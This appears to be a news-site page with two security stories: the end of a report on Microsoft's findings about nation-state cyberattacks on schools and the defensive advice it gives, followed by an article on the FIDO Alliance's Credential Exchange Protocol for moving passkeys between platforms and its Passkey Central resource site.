Some of the nation-state actors that Microsoft highlights are Peach Sandstorm, Mint Sandstorm, Mabna Institute, Emerald Sleet, and Moonstone Sleet, with an honorable mention for Storm-1877, which is still in development. 

Education institutions can protect themselves from these threats by implementing a new security curriculum, such as maintaining and scaling core cyber hygiene, prioritizing cyber awareness at all levels, whether students, IT staff, or faculty. Microsoft also advised hardening overall security posture as well as centralizing the technology stack, and implementing better monitoring procedures to get a clear picture of security posture and potential vulnerabilities.  

Microsoft highlighted some institutions such as Oregon State University and the Arizona Department of Education, which are both doing noteworthy jobs of implementing an ace cyber posture. The former's progress came in response to a major cybersecurity incident, prompting its Security Operations Center (SOC) alongside the help of AI and automated capabilities; the latter which focuses on zero-trust principles by blocking any traffic outside of the US from its 365 environment, Azure, and data center.

Microsoft: Schools Grapple With Thousands of Cyberattacks Weekly

“Passkeys,” the secure authentication mechanism built to replace passwords, are getting more portable and easier for organizations to implement thanks to new initiatives the FIDO Alliance announced on Monday.

The password-killing tech known as “passkeys” have proliferated over the past two years, developed by the tech industry association known as the FIDO Alliance as an easier and more secure authentication alternative. And although superseding any technology as entrenched as passwords is difficult, new features and resources launching this week are pushing passkeys toward a tipping point.

At the FIDO Alliance's Authenticate Conference in Carlsbad, California, on Monday, researchers are announcing two projects that will make passkeys easier for organizations to offer—and easier for everyone to use. One is a new technical specification called Credential Exchange Protocol (CXP) that will make passkeys portable between digital ecosystems, a feature that users have increasingly demanded. The other is a website, called Passkey Central, where developers and system administrators can find resources like metrics and implementation guides that make it easier to add support for passkeys on existing digital platforms.

“To me, both announcements are part of the broader story of the industry working together to stop our dependence on passwords,” Andrew Shikiar, CEO of the FIDO Alliance, told WIRED ahead of Monday's announcements. “And when it comes to CXP, we have all these companies who are fierce competitors willing to collaborate on credential exchange."

CXP comprises a set of draft specifications developed by the FIDO Alliance's “Credential Provider Special Interest Group.” Development of technical standards can often be a fraught bureaucratic process, but the creation of CXP seems to have been positive and collaborative. Researchers from the password managers 1Password, Bitwarden, Dashlane, NordPass, and Enpass all worked on CXP, as did those from the identity providers Okta as well as Apple, Google, Microsoft, Samsung, and SK Telecom.

The specifications are significant for a few reasons. CXP was created for passkeys and is meant to address a longstanding criticism that passkeys could contribute to user lock-in by making it prohibitively difficult for people to move between operating system vendors and types of devices. In many ways, though, this problem already exists with passwords. Export features that allow you to move all of your passwords from one manager to another are often dangerously exposed and essentially just dump a list of all of your passwords into a plaintext file.

It's gotten much easier to sync passkeys across your devices through a single password manager, but CXP aims to standardize the technical process for securely transferring them between platforms so users are free—and safe—to roam the digital landscape. Importantly, while CXP was designed with passkeys in mind, it is really a specification that can be adapted to securely exchange other secrets as well, including passwords or other types of data.

“In the future, this could apply to mobile driver's licenses, say, or passports—any secrets that you want to export somewhere and import into another system,” Christiaan Brand, identity and security group product manager at Google, tells WIRED. “We've got most of the rough edges sanded down with passkeys, but one of the main pieces of negative feedback over the past year has been around portability and potential vendor lock-in. I think with this, we are signaling to the world that passkeys are growing up.”

The goal of the resource repository Passkey Central is similarly to help the ecosystem expand and mature. Product leads or security professionals who want to implement passkeys for their user base may need to make a business case to executives to get budget for the project. The FIDO Alliance is basically aiming to help them with the pitch—providing data and communications materials—and then support their rollout with prefab materials like implementation and roll-out guides, user experience and design guidelines, documentation around accessibility, and troubleshooting.

“We've made amazing progress on passkeys,” FIDO's Shikiar says. “Usability and user experience are pretty much there. But we do have a punch list and we’re actively working on it. Portability is an important feature on that list. And while the biggest brands on the planet are now using passkeys at scale, there’s a very long tail of companies that haven’t gotten started yet. So we want to offer resources and the assets they need to be successful."

Craig Newmark Philanthropies' Cyber Civil Defense coalition provides some funding to advance passkeys. In an interview with WIRED ahead of Monday's announcements, Newmark said he believes that passkeys can make a real difference both for the digital security of individual people and for internet security overall.

“There are a lot of vulnerable systems out there,” Newmark says. “You need to make it a lot harder for bad actors to defeat password schemes. You need to make everything more secure, and passkeys is part of that.”

Tag

#apple